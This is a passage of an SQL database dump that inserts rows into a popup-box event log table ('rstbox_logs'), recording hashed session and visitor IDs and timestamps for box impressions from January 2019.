(47845, '403bbbb753b8f2b929ae0680e6593ef1', '4574603cf07e6399', 0, 2, 1, '2019-01-09 18:16:31'),
(47846, 'f816fc5ab14e88bd564cad7bebef0532', '3ba3484de462963c', 0, 2, 1, '2019-01-09 18:19:21'),
(47847, 'e5d4a0dcafa857dc85193e7194f549a9', '8d96482d446e2629', 0, 2, 1, '2019-01-09 18:20:05'),
(47848, '6d0e8fca05b7a9403b66be94419fa3d5', 'cc2105dbd92b227a', 0, 2, 1, '2019-01-09 18:21:26'),
(47849, '53bc19d4de175d9bb4318a8df1a27c5a', 'f8f101495173843a', 0, 2, 1, '2019-01-09 18:22:42'),
(47850, '53bc19d4de175d9bb4318a8df1a27c5a', 'f8f101495173843a', 0, 2, 1, '2019-01-09 18:22:50'),
(47851, '403bbbb753b8f2b929ae0680e6593ef1', '4574603cf07e6399', 0, 2, 1, '2019-01-09 18:23:20'),
(47852, 'e5d4a0dcafa857dc85193e7194f549a9', '8d96482d446e2629', 0, 2, 1, '2019-01-09 18:24:09'),
(47853, '8b0d76d080e56cb63c5d60f3f7ba76d1', '6d8c93203d1bd217', 0, 2, 1, '2019-01-09 18:25:54'),
(47854, '3097989a668fd8815c3eb1ab3bb65a84', 'a639f655bef0fc87', 0, 2, 1, '2019-01-09 18:26:01'),
(47855, '2d629d3659af53656d822ad8d4dd5591', '29608a328df169fa', 0, 2, 1, '2019-01-09 18:26:32'),
(47856, '2d629d3659af53656d822ad8d4dd5591', '29608a328df169fa', 0, 2, 1, '2019-01-09 18:26:40'),
(47857, 'f5f44c1c56418529e66459f202ec685b', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-09 18:28:22'),
(47858, 'e5d4a0dcafa857dc85193e7194f549a9', '8d96482d446e2629', 0, 2, 1, '2019-01-09 18:28:42'),
(47859, 'ddbf02ca14bd92b03448b17363f4e4dd', 'e64ed842304de12b', 0, 2, 1, '2019-01-09 18:31:12'),
(47860, 'ddbf02ca14bd92b03448b17363f4e4dd', 'e64ed842304de12b', 0, 2, 1, '2019-01-09 18:32:02'),
(47861, '72881a4cc468947ef35a22217d4e0e1e', 'd71d3df7c6bce5d4', 0, 2, 1, '2019-01-09 18:32:17'),
(47862, '76f438502bb7f9ed09491123566ec02f', '113a26d6adf3f967', 0, 2, 1, '2019-01-09 18:32:22'),
(47863, 'e5d4a0dcafa857dc85193e7194f549a9', '8d96482d446e2629', 0, 2, 1, '2019-01-09 18:32:53'),
(47864, '6d0e8fca05b7a9403b66be94419fa3d5', 'cc2105dbd92b227a', 0, 2, 1, '2019-01-09 18:35:20'),
(47865, '403bbbb753b8f2b929ae0680e6593ef1', '4574603cf07e6399', 0, 2, 1, '2019-01-09 18:36:10'),
(47866, 'e5d4a0dcafa857dc85193e7194f549a9', '8d96482d446e2629', 0, 2, 1, '2019-01-09 18:37:14'),
(47867, '76f438502bb7f9ed09491123566ec02f', '113a26d6adf3f967', 0, 2, 1, '2019-01-09 18:38:38'),
(47868, 'e5d4a0dcafa857dc85193e7194f549a9', '8d96482d446e2629', 0, 2, 1, '2019-01-09 18:41:20'),
(47869, 'ab20230e70a3db7e9d9177384c3adfc1', 'ead365992b655192', 0, 2, 1, '2019-01-09 18:44:12'),
(47870, 'ab20230e70a3db7e9d9177384c3adfc1', 'ead365992b655192', 0, 2, 1, '2019-01-09 18:45:23'),
(47871, 'e5d4a0dcafa857dc85193e7194f549a9', '8d96482d446e2629', 0, 2, 1, '2019-01-09 18:47:50'),
(47872, 'b71c07031e922cf290af6638dfbddc77', '71c8e334cfe84734', 0, 2, 1, '2019-01-09 18:48:36'),
(47873, '25df4a6bb30efc5d6522e7f068d4b275', '503a514a8daa32a7', 0, 2, 1, '2019-01-09 18:49:13'),
(47874, 'e5d4a0dcafa857dc85193e7194f549a9', '8d96482d446e2629', 0, 2, 1, '2019-01-09 18:52:33'),
(47875, '403bbbb753b8f2b929ae0680e6593ef1', '4574603cf07e6399', 0, 2, 1, '2019-01-09 18:55:44'),
(47876, 'e5d4a0dcafa857dc85193e7194f549a9', '8d96482d446e2629', 0, 2, 1, '2019-01-09 18:56:31'),
(47877, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2019-01-09 18:57:19'),
(47878, 'e5d4a0dcafa857dc85193e7194f549a9', '8d96482d446e2629', 0, 2, 1, '2019-01-09 18:57:59'),
(47879, 'e5d4a0dcafa857dc85193e7194f549a9', '8d96482d446e2629', 0, 2, 1, '2019-01-09 18:58:02'),
(47880, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2019-01-09 18:58:27'),
(47881, '623996e9006e705a985c693c6dd5845e', 'fa712c17b68709a5', 0, 2, 1, '2019-01-09 18:58:56'),
(47882, '623996e9006e705a985c693c6dd5845e', 'fa712c17b68709a5', 0, 2, 1, '2019-01-09 18:59:20'),
(47883, '763475ea2774c5732f66aae8ec58b6b4', 'f23da86a15ff67b6', 0, 2, 1, '2019-01-09 19:03:39'),
(47884, '7c95d9e2aef9ba3891c52258ad090d82', '36df536a050974c9', 0, 2, 1, '2019-01-09 19:10:44'),
(47885, '7c95d9e2aef9ba3891c52258ad090d82', '36df536a050974c9', 0, 2, 1, '2019-01-09 19:11:02'),
(47886, 'aba71526c80c9ea51f838da6d8fad64c', '31935fe90e9a4296', 0, 2, 1, '2019-01-09 19:15:45'),
(47887, '3405cc3cbdc26afa033f5fd7ce353d36', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-09 19:22:24'),
(47888, 'b556c199940956d8f14c712c5e95edd2', '6890cb6699f351f1', 0, 2, 1, '2019-01-09 19:30:13'),
(47889, '64d45ac1366b83441d060720a72e73e1', 'ff744a4d90b6a515', 0, 2, 1, '2019-01-09 20:08:23'),
(47890, '3355dd4de6762e100e2faa47c5c74641', '5580ece6b57f6c21', 0, 2, 1, '2019-01-09 20:13:47'),
(47891, '3355dd4de6762e100e2faa47c5c74641', '5580ece6b57f6c21', 0, 2, 1, '2019-01-09 20:14:07'),
(47892, '3355dd4de6762e100e2faa47c5c74641', '5580ece6b57f6c21', 0, 2, 1, '2019-01-09 20:14:24'),
(47893, '04df831cea82f65210eaa688d7fe089b', '24b84c15da6f0d96', 0, 2, 1, '2019-01-09 20:28:28'),
(47894, 'fa32ddb23db8dd1e82d9656935b6426e', '808a02371782f04b', 0, 2, 1, '2019-01-09 20:30:08'),
(47895, 'fa32ddb23db8dd1e82d9656935b6426e', '808a02371782f04b', 0, 2, 1, '2019-01-09 20:30:19'),
(47896, 'fa32ddb23db8dd1e82d9656935b6426e', '808a02371782f04b', 0, 2, 1, '2019-01-09 20:31:02'),
(47897, 'fa32ddb23db8dd1e82d9656935b6426e', '808a02371782f04b', 0, 2, 1, '2019-01-09 20:31:45'),
(47898, 'fa32ddb23db8dd1e82d9656935b6426e', '808a02371782f04b', 0, 2, 1, '2019-01-09 20:31:53'),
(47899, 'ba758479b5a84a2e5b3e4685ab178ce8', 'bdf11ad1df46f17e', 0, 2, 1, '2019-01-09 20:45:29'),
(47900, 'ba758479b5a84a2e5b3e4685ab178ce8', 'bdf11ad1df46f17e', 0, 2, 1, '2019-01-09 20:47:37'),
(47901, '6fb0521a76767b80b17e5b1c9dcc284a', '2c3943977b792700', 0, 2, 1, '2019-01-09 20:50:24'),
(47902, 'd9b1ab3ab3dd327741660b16986f92fd', '335271cb360704e7', 0, 2, 1, '2019-01-09 20:51:44'),
(47903, '0c44c012c33ae0513bc06d80f90309a7', 'ee18baf5cac94550', 0, 2, 1, '2019-01-09 21:01:32'),
(47904, '0c44c012c33ae0513bc06d80f90309a7', 'ee18baf5cac94550', 0, 2, 1, '2019-01-09 21:02:38'),
(47905, 'b17fd18b336a1b5b653696c7545019e0', '77021567e5f48d94', 0, 2, 1, '2019-01-09 21:09:42'),
(47906, '23a15771eeef3a1cb7d00df746f22947', 'db10b503a2e2eecc', 0, 2, 1, '2019-01-09 21:15:46'),
(47907, '3c8afb5617780e4918aa456790927ffc', 'dfdba71c00a741d9', 0, 2, 1, '2019-01-09 21:18:59'),
(47908, '3c8afb5617780e4918aa456790927ffc', 'dfdba71c00a741d9', 0, 2, 1, '2019-01-09 21:19:54'),
(47909, '3c8afb5617780e4918aa456790927ffc', 'dfdba71c00a741d9', 0, 2, 1, '2019-01-09 21:20:12'),
(47910, '5ae3847c8e572662b196ec589d572a6e', '5cb17a2462de9dc9', 0, 2, 1, '2019-01-09 21:28:28'),
(47911, '27004ef92418afc05abd5870212fa786', 'b211a7f2eddef954', 0, 2, 1, '2019-01-09 21:30:46'),
(47912, '2cbec9639ca941ce9ebb913e36e82572', '88388912969595b7', 0, 2, 1, '2019-01-09 21:54:29'),
(47913, '57ad1395c9e65780585e6ee339590bca', 'bc16d4cf101606eb', 0, 2, 1, '2019-01-09 22:27:41'),
(47914, '57ad1395c9e65780585e6ee339590bca', 'bc16d4cf101606eb', 0, 2, 1, '2019-01-09 22:28:20'),
(47915, '3888e6c4ddaeea39b110fe1a35d237f0', '9a5016d6ccef014c', 0, 2, 1, '2019-01-09 22:28:39'),
(47916, '3888e6c4ddaeea39b110fe1a35d237f0', '9a5016d6ccef014c', 0, 2, 1, '2019-01-09 22:29:17'),
(47917, '57ad1395c9e65780585e6ee339590bca', 'bc16d4cf101606eb', 0, 2, 1, '2019-01-09 22:29:29'),
(47918, '57ad1395c9e65780585e6ee339590bca', 'bc16d4cf101606eb', 0, 2, 1, '2019-01-09 22:30:12'),
(47919, '3888e6c4ddaeea39b110fe1a35d237f0', '9a5016d6ccef014c', 0, 2, 1, '2019-01-09 22:33:14'),
(47920, '3888e6c4ddaeea39b110fe1a35d237f0', '9a5016d6ccef014c', 0, 2, 1, '2019-01-09 22:39:12'),
(47921, '3888e6c4ddaeea39b110fe1a35d237f0', '9a5016d6ccef014c', 0, 2, 1, '2019-01-09 22:41:02'),
(47922, 'df45a12ef6d5d9a1d51b8871fddbee0d', 'b87cac985410a5fb', 0, 2, 1, '2019-01-09 22:54:27'),
(47923, '5050f9ab226f410e9a6bb081153cc3f8', '29ef45db200a8f59', 0, 2, 1, '2019-01-09 22:55:09'),
(47924, '5050f9ab226f410e9a6bb081153cc3f8', '29ef45db200a8f59', 0, 2, 1, '2019-01-09 22:55:41'),
(47925, '5050f9ab226f410e9a6bb081153cc3f8', '29ef45db200a8f59', 0, 2, 1, '2019-01-09 22:56:58'),
(47926, 'df45a12ef6d5d9a1d51b8871fddbee0d', 'b87cac985410a5fb', 0, 2, 1, '2019-01-09 22:57:17'),
(47927, '5050f9ab226f410e9a6bb081153cc3f8', '29ef45db200a8f59', 0, 2, 1, '2019-01-09 22:57:43'),
(47928, '5050f9ab226f410e9a6bb081153cc3f8', '29ef45db200a8f59', 0, 2, 1, '2019-01-09 22:58:12'),
(47929, 'df45a12ef6d5d9a1d51b8871fddbee0d', 'b87cac985410a5fb', 0, 2, 1, '2019-01-09 22:58:20'),
(47930, '5050f9ab226f410e9a6bb081153cc3f8', '29ef45db200a8f59', 0, 2, 1, '2019-01-09 22:58:28'),
(47931, '222a0cdff543caf5f4f4f218fb493d2f', 'f28c8d9e35a44906', 0, 2, 1, '2019-01-09 23:00:38'),
(47932, 'df45a12ef6d5d9a1d51b8871fddbee0d', 'b87cac985410a5fb', 0, 2, 1, '2019-01-09 23:02:23'),
(47933, '65cd3fa667855caf703d2fd5fa24349b', 'c9800e3142b94772', 0, 2, 1, '2019-01-09 23:02:39'),
(47934, '124a20247d0c0a1bd9263f3d884851ed', 'e13a793adb9b3152', 0, 2, 1, '2019-01-09 23:58:42'),
(47935, '124a20247d0c0a1bd9263f3d884851ed', 'e13a793adb9b3152', 0, 2, 1, '2019-01-09 23:59:12'),
(47936, '124a20247d0c0a1bd9263f3d884851ed', 'e13a793adb9b3152', 0, 2, 1, '2019-01-10 00:00:36'),
(47937, '124a20247d0c0a1bd9263f3d884851ed', 'e13a793adb9b3152', 0, 2, 1, '2019-01-10 00:02:45'),
(47938, '4b3414f775c884d60032b62cba0f2173', '0d31db1165392b94', 0, 2, 1, '2019-01-10 00:44:03'),
(47939, 'cfdd62f316e95159e190418f38faf0f3', '691ad0f00b5acb57', 0, 2, 1, '2019-01-10 01:42:53'),
(47940, '58bbe8ba63dc9c4068a4929f38b73584', '330a028b8fe737cc', 0, 2, 1, '2019-01-10 02:35:35'),
(47941, '58bbe8ba63dc9c4068a4929f38b73584', '330a028b8fe737cc', 0, 2, 1, '2019-01-10 02:42:04'),
(47942, '9ae5240a0e1b6e29e119d599352a542b', '3d517fbeb7504b09', 0, 2, 1, '2019-01-10 03:13:17'),
(47943, 'b3cca6aca460c9581bae0e04d8c06684', '211b2a250a35c20c', 0, 2, 1, '2019-01-10 04:10:49'),
(47944, '8d2baa12bd5ecd86329c1f14481729f1', 'ead365992b655192', 0, 2, 1, '2019-01-10 04:14:20'),
(47945, '8008b806bbbb04caf99606951f78b7cc', 'fcaa8f64899ac4f9', 0, 2, 1, '2019-01-10 04:24:25'),
(47946, '42d0b551faee646739c6133b2a8427a0', '963f5041a9f14011', 0, 2, 1, '2019-01-10 04:31:20'),
(47947, '42d0b551faee646739c6133b2a8427a0', '963f5041a9f14011', 0, 2, 1, '2019-01-10 04:31:44'),
(47948, 'f020482986ac9f3a616b4a8475258d48', '49e65f9c1a93a7d5', 0, 2, 1, '2019-01-10 04:33:07'),
(47949, 'd7dc96b16b10b403a546762935adc884', '2fa458d0337a4355', 0, 2, 1, '2019-01-10 04:42:30'),
(47950, '049e58707b5c3deeeed7e235cfd2b7f2', '45f0fc3fdd2172b7', 0, 2, 1, '2019-01-10 05:27:07'),
(47951, '3a996ed8c8ac8973f8fa1439e1f3ae52', 'e5437e7d92e91bca', 0, 2, 1, '2019-01-10 05:49:21'),
(47952, 'e7bdfa864fd884d94f9f87ff04854099', 'f24eedefadb4aa69', 0, 2, 1, '2019-01-10 06:07:52'),
(47953, 'e7bdfa864fd884d94f9f87ff04854099', 'f24eedefadb4aa69', 0, 2, 1, '2019-01-10 06:12:23'),
(47954, 'e7bdfa864fd884d94f9f87ff04854099', 'f24eedefadb4aa69', 0, 2, 1, '2019-01-10 06:13:06'),
(47955, '90a294a22369f1ade6f945e4381d50fd', 'f24eedefadb4aa69', 0, 2, 1, '2019-01-10 06:18:24'),
(47956, '7d6ccd6b4142c9c11c3389424daed889', 'f8347a06ba9fe4c3', 0, 2, 1, '2019-01-10 06:19:26'),
(47957, '5557a5f19d4b480f5f67e8b48549c2a7', '41baa8b39e9be9be', 0, 2, 1, '2019-01-10 06:24:50'),
(47958, 'fdd0708cb71114c68107fdc08a4faa75', '06768146a55e987a', 0, 2, 1, '2019-01-10 06:33:58'),
(47959, 'a60579704f3f82345f617ad32175e08b', 'a1c6674e2d316581', 0, 2, 1, '2019-01-10 06:46:25'),
(47960, 'e3e2562f1fa75c996698cfa34c77a647', '37462feb6b538158', 0, 2, 1, '2019-01-10 06:55:00'),
(47961, 'c42caaea4c51732374496c5c32e9eb7e', 'b3fb8540efdab4b7', 0, 2, 1, '2019-01-10 07:04:37'),
(47962, 'c42caaea4c51732374496c5c32e9eb7e', 'b3fb8540efdab4b7', 0, 2, 1, '2019-01-10 07:05:26'),
(47963, 'c42caaea4c51732374496c5c32e9eb7e', 'b3fb8540efdab4b7', 0, 2, 1, '2019-01-10 07:11:55'),
(47964, 'ad3270b85615c5debb98413f74f358c4', 'b496d85defbbb42f', 0, 2, 1, '2019-01-10 07:27:57'),
(47965, 'ad3270b85615c5debb98413f74f358c4', 'b496d85defbbb42f', 0, 2, 1, '2019-01-10 07:28:58'),
(47966, 'cb6602bf3d8dfd7a19999347533ceb9a', 'e7051b86b5323d9d', 0, 2, 1, '2019-01-10 07:52:42'),
(47967, 'cc585f538550fd20ea69fb6b0a1861af', '2e3224325bea926a', 0, 2, 1, '2019-01-10 07:52:46'),
(47968, 'cb6602bf3d8dfd7a19999347533ceb9a', 'e7051b86b5323d9d', 0, 2, 1, '2019-01-10 07:54:30'),
(47969, 'e083a7a86691d00877e528a27ce4f6fb', 'a2360fa179c66516', 0, 2, 1, '2019-01-10 08:13:03'),
(47970, 'ed0d8a7c8b1dda4aa44696e41947ad8b', '118999745ab43a04', 0, 2, 1, '2019-01-10 08:13:47'),
(47971, '535fc30553b1b2731051b26401f96df8', 'cad202a09758cb3a', 0, 2, 1, '2019-01-10 08:14:12'),
(47972, '4cf7a3758da1c82db8f0fd177c6f8d27', '577244294f13954d', 0, 2, 1, '2019-01-10 08:30:16'),
(47973, '728f83364f8e0b1fe6a002db3e4f630f', 'eb98b4b058f70c68', 0, 2, 1, '2019-01-10 09:44:52'),
(47974, '728f83364f8e0b1fe6a002db3e4f630f', 'eb98b4b058f70c68', 0, 2, 1, '2019-01-10 09:44:53'),
(47975, '548558ccd72e2263c67fa323e21b8d69', '15c25cc98f4c5963', 0, 2, 1, '2019-01-10 10:56:27'),
(47976, '548558ccd72e2263c67fa323e21b8d69', '15c25cc98f4c5963', 0, 2, 1, '2019-01-10 10:57:43'),
(47977, '295980022da18ae98821730b9f25314c', '0e2ca23785b06b82', 0, 2, 1, '2019-01-10 11:09:35'),
(47978, '059d5acc20e962575464640815a32d82', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-10 11:16:56'),
(47979, '6360f8b57dd685bf86f6b130be499193', '2ac73fd527e16579', 0, 2, 1, '2019-01-10 12:07:02'),
(47980, 'b2e4c493c24071a5c2ed2a5a88cc39a5', '1e8a7fa023e231db', 0, 2, 1, '2019-01-10 12:13:38'),
(47981, '446e597d439582a124085fbcec6dc5eb', 'b84c5d9a4db6ac0a', 0, 2, 1, '2019-01-10 12:58:51'),
(47982, 'cc344ca22cc01526c7c79c9a42f4df41', '30ea12d4f49e72a3', 0, 2, 1, '2019-01-10 12:58:51'),
(47983, 'cc344ca22cc01526c7c79c9a42f4df41', '30ea12d4f49e72a3', 0, 2, 1, '2019-01-10 12:59:05'),
(47984, 'cc344ca22cc01526c7c79c9a42f4df41', '30ea12d4f49e72a3', 0, 2, 1, '2019-01-10 12:59:41'),
(47985, 'cc344ca22cc01526c7c79c9a42f4df41', '30ea12d4f49e72a3', 0, 2, 1, '2019-01-10 13:01:32'),
(47986, 'cc344ca22cc01526c7c79c9a42f4df41', '30ea12d4f49e72a3', 0, 2, 1, '2019-01-10 13:02:13'),
(47987, '94faf17b1266fc4520185e7413eccb63', '15c25cc98f4c5963', 0, 2, 1, '2019-01-10 13:04:08'),
(47988, '28c9c5fc9c7cc7c5738e1a7ed0bcad99', '8c9db562eb8705f9', 0, 2, 1, '2019-01-10 13:04:48'),
(47989, '28c9c5fc9c7cc7c5738e1a7ed0bcad99', '8c9db562eb8705f9', 0, 2, 1, '2019-01-10 13:04:49'),
(47990, 'b5c1beb31c1f56f3b6f3215264797e2b', '51df446c19685386', 0, 2, 1, '2019-01-10 13:07:35'),
(47991, 'cb4cc9d72e4420eadd05df44e4321aa1', 'd09a3a195511f770', 0, 2, 1, '2019-01-10 13:16:31'),
(47992, 'cb4cc9d72e4420eadd05df44e4321aa1', 'd09a3a195511f770', 0, 2, 1, '2019-01-10 13:16:48'),
(47993, 'cb0edcb71c4ca647c00e8947e722418e', 'fe4e1b6a1d9a78e8', 0, 2, 1, '2019-01-10 13:18:16'),
(47994, '732e0e1e5cc83e5aceca78e543df05ef', '963f5041a9f14011', 0, 2, 1, '2019-01-10 13:21:34'),
(47995, 'e47a00c3e16eb705fbbb556cdbbb4cdd', '1caa40105574c699', 0, 2, 1, '2019-01-10 13:34:28'),
(47996, 'dfff09a2a0becd8e43109c75fc962ca7', 'f1b1362932b1abb1', 0, 2, 1, '2019-01-10 14:11:02'),
(47997, 'dfff09a2a0becd8e43109c75fc962ca7', 'f1b1362932b1abb1', 0, 2, 1, '2019-01-10 14:11:35'),
(47998, 'dfff09a2a0becd8e43109c75fc962ca7', 'f1b1362932b1abb1', 0, 2, 1, '2019-01-10 14:11:57'),
(47999, 'dfff09a2a0becd8e43109c75fc962ca7', 'f1b1362932b1abb1', 0, 2, 1, '2019-01-10 14:13:15'),
(48000, '97fdb174ff8fa7fa2437d0715f7beb71', '09b8b70410a620df', 0, 2, 1, '2019-01-10 14:34:31'),
(48001, '4a86da76b633540af967d66aa4ebda2b', 'fd3ee3217b19466d', 0, 2, 1, '2019-01-10 15:11:34'),
(48002, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2019-01-10 15:20:09');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(48003, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2019-01-10 15:23:29'),
(48004, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2019-01-10 15:24:56'),
(48005, 'ac8ee77cab3a884f30eab61feaab2754', 'a8f07d1f340496df', 0, 2, 1, '2019-01-10 15:30:18'),
(48006, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-10 15:57:27'),
(48007, 'f75dd8994141e6da3ad00244c1f81b92', '67bcd7108d43c2d8', 0, 2, 1, '2019-01-10 15:58:07'),
(48008, 'f75dd8994141e6da3ad00244c1f81b92', '67bcd7108d43c2d8', 0, 2, 1, '2019-01-10 15:58:35'),
(48009, 'e00a31f6cf96d5926231fde4b1bcfcda', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-10 16:01:08'),
(48010, 'e00a31f6cf96d5926231fde4b1bcfcda', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-10 16:04:22'),
(48011, 'f75dd8994141e6da3ad00244c1f81b92', '67bcd7108d43c2d8', 0, 2, 1, '2019-01-10 16:04:55'),
(48012, '20c1877c4f316f4b9d597524d34e8b0d', '0b83b588375e9508', 0, 2, 1, '2019-01-10 16:08:29'),
(48013, 'f75dd8994141e6da3ad00244c1f81b92', '67bcd7108d43c2d8', 0, 2, 1, '2019-01-10 16:09:02'),
(48014, 'b899d20fb5d02e650f5d91936b7b2ad3', '51df446c19685386', 0, 2, 1, '2019-01-10 16:10:28'),
(48015, 'd76d62a222a9b6821baec76bc7c2618b', 'a8526f6e757f5fda', 0, 2, 1, '2019-01-10 16:12:18'),
(48016, 'f75dd8994141e6da3ad00244c1f81b92', '67bcd7108d43c2d8', 0, 2, 1, '2019-01-10 16:13:06'),
(48017, 'a80305494e8f554f9ad9eb32e95d5e3e', '7c665d2c8463812a', 0, 2, 1, '2019-01-10 16:13:44'),
(48018, 'eec4e45745899b5e4fb0ecc827889a75', '6a4507b4da55ef6e', 0, 2, 1, '2019-01-10 16:16:23'),
(48019, '20cf6906bb82ca257abc3c0b9c1eadb9', '9fa71c818742c95f', 0, 2, 1, '2019-01-10 16:19:15'),
(48020, '57660e48fbe4d260f41abfd3ad5ea1a3', '51df446c19685386', 0, 2, 1, '2019-01-10 16:19:45'),
(48021, 'e00a31f6cf96d5926231fde4b1bcfcda', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-10 16:20:45'),
(48022, 'd66ff4764a9fa8e7604a40a1beead54b', '324b9b48cb70ff46', 0, 2, 1, '2019-01-10 16:37:19'),
(48023, 'd66ff4764a9fa8e7604a40a1beead54b', '324b9b48cb70ff46', 0, 2, 1, '2019-01-10 16:37:28'),
(48024, 'd66ff4764a9fa8e7604a40a1beead54b', '324b9b48cb70ff46', 0, 2, 1, '2019-01-10 16:37:54'),
(48025, 'd66ff4764a9fa8e7604a40a1beead54b', '324b9b48cb70ff46', 0, 2, 1, '2019-01-10 16:38:10'),
(48026, 'd8ac0534015e78bf588534c261fa7ea2', 'b50d65df97c0251e', 0, 2, 1, '2019-01-10 16:38:50'),
(48027, '20cf6906bb82ca257abc3c0b9c1eadb9', '9fa71c818742c95f', 0, 2, 1, '2019-01-10 16:42:01'),
(48028, 'e00a31f6cf96d5926231fde4b1bcfcda', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-10 16:43:39'),
(48029, '6fc2e72791afba892ffd0beae25cba1b', 'cad202a09758cb3a', 0, 2, 1, '2019-01-10 16:44:29'),
(48030, '7f0d32c731b4105f0dbbad760d509ffe', '6c52121b18bc3b56', 0, 2, 1, '2019-01-10 16:47:57'),
(48031, '7f0d32c731b4105f0dbbad760d509ffe', '6c52121b18bc3b56', 0, 2, 1, '2019-01-10 16:47:58'),
(48032, '62cf84299cc38d7055d91f1a5b6ae0bb', 'b3fb8540efdab4b7', 0, 2, 1, '2019-01-10 16:49:32'),
(48033, 'e00a31f6cf96d5926231fde4b1bcfcda', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-10 16:49:41'),
(48034, '6fc2e72791afba892ffd0beae25cba1b', 'cad202a09758cb3a', 0, 2, 1, '2019-01-10 16:51:01'),
(48035, 'ebeffc1b2e6c2e66b12ecdfcead4b37a', '6a4507b4da55ef6e', 0, 2, 1, '2019-01-10 16:54:48'),
(48036, 'a7d8641a94daff3a4b09752118903b86', 'bb5e1bed8f5f17af', 0, 2, 1, '2019-01-10 16:58:14'),
(48037, '20c1877c4f316f4b9d597524d34e8b0d', '0b83b588375e9508', 0, 2, 1, '2019-01-10 17:01:22'),
(48038, '1624e62f3de58954a35fcb860fcda28b', '8dfae410aab5b58b', 0, 2, 1, '2019-01-10 17:06:26'),
(48039, '62cf84299cc38d7055d91f1a5b6ae0bb', 'b3fb8540efdab4b7', 0, 2, 1, '2019-01-10 17:08:12'),
(48040, '3bc76409f2911af094d5f5b8df3d72c9', '93614b738c4678f8', 0, 2, 1, '2019-01-10 17:11:47'),
(48041, 'f75dd8994141e6da3ad00244c1f81b92', '67bcd7108d43c2d8', 0, 2, 1, '2019-01-10 17:12:33'),
(48042, 'af0cb17019279c3e3281f23a4076a28e', '02829647d6d6d42d', 0, 2, 1, '2019-01-10 17:14:04'),
(48043, 'e00a31f6cf96d5926231fde4b1bcfcda', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-10 17:14:17'),
(48044, '3bc76409f2911af094d5f5b8df3d72c9', '93614b738c4678f8', 0, 2, 1, '2019-01-10 17:14:20'),
(48045, 'd8ac0534015e78bf588534c261fa7ea2', 'b50d65df97c0251e', 0, 2, 1, '2019-01-10 17:14:37'),
(48046, '3bc76409f2911af094d5f5b8df3d72c9', '93614b738c4678f8', 0, 2, 1, '2019-01-10 17:15:20'),
(48047, 'f75dd8994141e6da3ad00244c1f81b92', '67bcd7108d43c2d8', 0, 2, 1, '2019-01-10 17:18:04'),
(48048, 'fa76e411df1e20588745b6048850cad4', 'f10990f26adcd1c5', 0, 2, 1, '2019-01-10 17:18:07'),
(48049, '551e214dd448f9402b45f44bafb558ec', 'dba49dcafdc2b991', 0, 2, 1, '2019-01-10 17:21:21'),
(48050, 'e00a31f6cf96d5926231fde4b1bcfcda', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-10 17:27:04'),
(48051, '14ff1a60bc2c8ee17208376b183b08db', 'c6e97f17cebc7ba8', 0, 2, 1, '2019-01-10 17:27:20'),
(48052, 'f75dd8994141e6da3ad00244c1f81b92', '67bcd7108d43c2d8', 0, 2, 1, '2019-01-10 17:27:38'),
(48053, '14ff1a60bc2c8ee17208376b183b08db', 'c6e97f17cebc7ba8', 0, 2, 1, '2019-01-10 17:28:40'),
(48054, 'f75dd8994141e6da3ad00244c1f81b92', '67bcd7108d43c2d8', 0, 2, 1, '2019-01-10 17:30:54'),
(48055, '20cf6906bb82ca257abc3c0b9c1eadb9', '9fa71c818742c95f', 0, 2, 1, '2019-01-10 17:32:26'),
(48056, '20cf6906bb82ca257abc3c0b9c1eadb9', '9fa71c818742c95f', 0, 2, 1, '2019-01-10 17:33:56'),
(48057, 'f75dd8994141e6da3ad00244c1f81b92', '67bcd7108d43c2d8', 0, 2, 1, '2019-01-10 17:34:46'),
(48058, 'f75dd8994141e6da3ad00244c1f81b92', '67bcd7108d43c2d8', 0, 2, 1, '2019-01-10 17:35:45'),
(48059, 'e00a31f6cf96d5926231fde4b1bcfcda', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-10 17:36:12'),
(48060, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-10 17:36:28'),
(48061, '14ff1a60bc2c8ee17208376b183b08db', 'c6e97f17cebc7ba8', 0, 2, 1, '2019-01-10 17:36:45'),
(48062, 'f75dd8994141e6da3ad00244c1f81b92', '67bcd7108d43c2d8', 0, 2, 1, '2019-01-10 17:36:51'),
(48063, 'e00a31f6cf96d5926231fde4b1bcfcda', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-10 17:37:14'),
(48064, '4d6abbaff88e20f7bc2240f4df4a1309', 'e3454d790deac400', 0, 2, 1, '2019-01-10 17:37:41'),
(48065, 'f75dd8994141e6da3ad00244c1f81b92', '67bcd7108d43c2d8', 0, 2, 1, '2019-01-10 17:38:26'),
(48066, 'e00a31f6cf96d5926231fde4b1bcfcda', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-10 17:38:27'),
(48067, '4c1003a68f10344e5a9004537bc613d8', 'e059f0167d284854', 0, 2, 1, '2019-01-10 17:41:00'),
(48068, 'c35b7e8b9a0f81d3bfa5b8b3b03c5fbc', '679c2311f97bf8cf', 0, 2, 1, '2019-01-10 17:42:42'),
(48069, '2547797e22c8136e73288a816cb38293', 'd997b6be7e152961', 0, 2, 1, '2019-01-10 17:44:58'),
(48070, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2019-01-10 17:46:31'),
(48071, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2019-01-10 17:46:59'),
